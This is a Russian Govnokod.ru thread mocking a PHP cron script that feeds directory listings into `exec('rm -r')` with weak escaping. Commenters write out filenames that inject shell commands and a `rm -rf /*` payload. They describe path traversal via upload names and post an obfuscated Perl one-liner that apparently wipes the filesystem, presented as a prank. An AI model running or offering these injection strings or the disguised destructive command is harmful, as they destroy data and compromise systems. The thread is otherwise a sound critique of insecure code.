Говнокод #23370 — PHP — Говнокод.ру

PHP / Говнокод #23370

+2
1. 01
2. 02
3. 03
4. 04
5. 05
6. 06
7. 07
8. 08
9. 09
10. 10
```
$ls = explode("\n", shell_exec("ls -A"));
foreach ($ls as $item) {
	if ($item != 'doc2txt.php' and $item != 'nohup.out' and trim($item) != '') {
		$dir = str_replace(
			[' ', '(', ')', ';', '=', '<', '>', "'"],
			['\ ', '$', '$', '\;', '\=', '\<', '\>', "\'"],
			$item);
		exec("rm -r -- $dir");
	}
}
```
Cron
00 20 * * * /usr/bin/php /var/www/somedir/data/scripts/doc2xml/doc2txt.php
Allahu akbar !

Запостил: abyss, 28 Сентября 2017

Tweet
Комментарии (40) RSS
- Stallman 28.09.2017 12:58 # +2
  touch 'foo\ doc2txt.php'
  Ответить
  - bormand 28.09.2017 20:03 # +1
    
    touch 'foo\ $HOME' touch 'foo\ || echo "PWND"'
    Ответить
    - bormand 28.09.2017 20:15 # 0
      
      touch '$HOME && echo PWND.doc'
      Ответить
      
      bormand 28.09.2017 20:25 # 0
      
      Чёрт, пробелы нельзя же юзать...
      Ответить
  - bormand 28.09.2017 20:33 # +4
    
    Финальная версия:
    touch "`echo -ne '$HOME&&echo\tPWND|tee\tPWND.doc'`"
    Ответить
    - bormand 28.09.2017 20:38 # 0
      
      Кстати, а PHP защищает от заливки подобного говна с табами и спецсимволами через POST?
      Ответить
      
      Stallman 29.09.2017 02:05 # +3
      
      Не ну пхп все же не настолько решето, файлики зальются в переименованными в темповую директорию. Впрочем, ничто не мешает пыхомакаке достать говно с табами из запроса и засунуть куда не следует. Так что самая большая уязвимость пхп – это погромисты на нем.
      Ответить
      
      bormand 29.09.2017 07:11 # 0
      
      В примере они предлагают делать move_uploaded_file под оригинальное имя, которое в посте прилетело... Вот и интересно, фильтрует ли оно подобный мусор.
      Ответить
      
      Stallman 29.09.2017 10:30 # +2
      
      Судя по первому комментарию http://php.net/manual/en/function.move-uploaded-file.php#111412, ничего оно не фильтрует. К слову, функция из того поста достойна отдельного говнокода. :3
      Ответить
      
      SemaReal 30.09.2017 05:29 # 0
      
      Нас уже 14 485 260.
      Ответить
      
      inho 30.09.2017 23:48 # 0
      
      Что может случиться, если не отфильтровать?
      Ответить
      
      bormand 01.10.2017 07:22 # +1
      
      См. специально сформированное имя файла выше ;)
      Ответить
      
      gost 01.10.2017 09:03 # 0
      
      fotochka.jpg && rm -rf /*
      Ответить
      
      inho 01.10.2017 11:44 # 0
      
      Ну это для долбоебов, которые в exec засовывают. Что будет если имя файла такое создастся?
      Ответить
      
      bormand 01.10.2017 13:24 # +1
      
      А ты думаешь, что таких долбоёбов мало? Не в exec засунут, так в sql или html запихают без экранировки.
      
      Лучше уж зафильтровать имя к хуям или вообще заменить уникальной айдишкой, чем расширять поверхность атаки до всех говноскриптов, которые это имя могут увидеть.
      Ответить
      
      gost 01.10.2017 13:34 # +2
      
      g: move_uploaded_file cve
      https://tools.cisco.com/security/center/viewAlert.x?alertId=38762, например.
      Ответить
      
      Stallman 01.10.2017 13:58 # +2
      
      Ну, во-первых:
      
      ../../../index.php
      
      потому во всех примерах берут basename() от приходящего имени.
      Во-вторых, некорректная обработка нулевого байта в move_uploaded_file(), что припомнили выше. Уже как-бы пофиксили, но какая уважающая себя пыхомакака в здравом уме обновит свой пых и похерит половину работавших ранее костылей? Тут стоить припомнить уебанский пыховерсионинг, когда ломающие изменения могут прилететь и с минорным апдейтом.
      Наконец, наличие символов, не допустимых для используемой ФС. Не фатально, но неприятно.
      Существует не так много кейсов, когда имя файла, приходящее в посте, имеет какое-то значение. В остальных 99% случаев уж точно нужно переименовать а в случае картинок/видосиков ещё и пережать. Ибо нехуй.
      Ответить
      
      inho 01.10.2017 22:50 # 0
      
      ФС разве даст создать имя со слешом?
      Ответить
      
      Stallman 01.10.2017 23:17 # 0
      
      Не даст, но ей и не надо. Путь будет интерпретирован как относительный и файл будет создан где-то за пределами директории для загрузок. Например, в /var/www/somedir/data/scripts/doc2xml/.
      Ответить
      
      vistefan 03.10.2017 13:11 # +1
      
      @ПЫТАЕШЬСЯ СОЗДАТЬ ФАЙЛ С ТАКИМ ИМЕНЕМ
      @ЧТО-ТО ПОШЛО НЕ ТАК
      @СНЕС СЕБЕ СИСТЕМУ
      Ответить
      
      gost 03.10.2017 17:48 # 0
      
      Ну как тут не вспомнить нестареющую классику:
      
      cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
      Ответить
      
      vistefan 03.10.2017 17:59 # +2
      
      Уже не сработает в бубунтах. Пофиксили запуск в корне, нужен ключ --preserve-root.
      Ответить
      
      gost 03.10.2017 20:18 # 0
      
      Я починил:
      
      cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{=?\$/|<-|}<&|`~{;;y;~ -/:-@[-`{-};*`-{/" -;;s;;$_;see'
      
      Теперь с добавкой sudo!
      Ответить
      
      inho 03.10.2017 20:21 # +1
      
      и что, никакие антивирусы на это не поругаются?
      Ответить
      
      gost 03.10.2017 20:24 # +1
      
      Нет: https://www.virustotal.com/#/file/658c058126ef1f6eb298786fbf62a8a402a0ad5c
      6d8780524d34e2514532b32a/detection
      (ГК - бака, незаметно вставил пробел посередине)
      Ответить
      
      inho 03.10.2017 22:24 # 0
      
      Oops, I know nothing about this item. Hi there, my name is Win32.Helpware.VT... certain antivirus labs also call me W32.eHeur.BadNews.GAFE, I guess it is because every time I appear they get very upset. It looks like you found a hole in my malware net... The request failed with status code: 404
      Ответить
      
      gost 03.10.2017 22:27 # 0
      
      inho, объедини части URL'а, inho!
      Ответить
      
      inho 03.10.2017 23:23 # 0
      
      Блин, нахрен ты пробел поставил, gost?
      Ответить
      
      Stallman 03.10.2017 22:54 # +3
      
      Проголосовал за "Safe"
      Ответить
      
      inho 03.10.2017 23:24 # 0
      
      Ну правильно, для винды то угрозы никакой
      Ответить
      
      Stallman 04.10.2017 00:35 # +2
      
      А оно так и работает на самом деле.
      На неприкрытый rm -rf /* всем похуй
      http://bit.ly/2ynTdK8
      А вот на батник ругается :3
      http://bit.ly/2fOMpO7
      Ответить
      
      Stallman 04.10.2017 00:43 # +2
      
      А вот в вызове system(), то какой-то икарус чует неладное:
      http://bit.ly/2g7Y5s8
      ... но ровно до тех пор, пока бинарь не стрипнули, лол
      http://bit.ly/2g9CU97
      Ответить
      
      inkanus-gray 04.10.2017 01:07 # 0
      
      Внезапно: у сайта http://www.ikarus.hu/ есть версия на русском языке. Они всё ещё надеются, что мы будем покупать их железки.
      Ответить
      
      gost 04.10.2017 07:02 # 0
      
      >> Trojan.Win32.FormatC.m
      Я так понимаю, у них ещё есть Trojan.Win32.FormatA.m, Trojan.Win32.FormatB.m, ..., Trojan.Win32.FormatZ.m?
      Ответить
      
      SemaReal 08.10.2017 00:00 # 0
      
      зачем A и B, когда дискет больше нет?
      Ответить
      
      bormand 08.10.2017 09:13 # +2
      
      > когда дискет больше нет
      А вдруг я туда флешку замапаю?
      Ответить
      
      SemaReal 11.10.2017 04:14 # +3
      
      Интересно кстати, почему так никто не делает.
      Я ставлю винду десятку и она мой диск помечает как C. А могла бы как A.
      
      С другой стороны половина говнопрограмм бы наверняка отвалилась
      
      зы: вот тебе загадка (я в свое время пол дня убил чтобы найти ответ): как винда привязывает том к букве?
      
      Ответить
      
      bormand 11.10.2017 08:10 # 0
      
      > как винда привязывает том к букве
      По айдишке диска/раздела вроде бы, а маппинг в реестре хранится. Нет?
      Ответить
- gost 30.09.2017 23:09 # +1
  
  > exec("rm -r -- $dir");
  Даже не знаю, насколько нужно быть отбитым, чтобы поместить переменную, в которую может прилететь хоть что-то от пользователя, в exec...
  Ответить
  - bormand 01.10.2017 07:37 # +2
    
    И насколько нужно быть отбитым, чтобы поместить скрипт в каталог с данными, а потом героически спасать его от обработки самим собой.
    Ответить
Добавить комментарий
Ошибка компиляции комментария:

Гости могут высказаться только в понедельник, среду, четверг или воскресение
Я, guest, находясь в здравом уме и твердой памяти, торжественно заявляю:

А не использовать ли нам bbcode?

[b]жирный[/b] — жирный

[i]курсив[/i] — курсив

[u]подчеркнутый[/u] — подчеркнутый

[s]перечеркнутый[/s] — перечеркнутый

[blink]мигающий[/blink] — мигающий

[color=red]цвет[/color] — цвет (подробнее)

[size=20]размер[/size] — размер (подробнее)

[code=<language>]some code[/code] (подробнее)

Проверочный код: *

Говнокод: по колено в коде.

PHP / Говнокод #23370

Комментарии (40) RSS

Добавить комментарий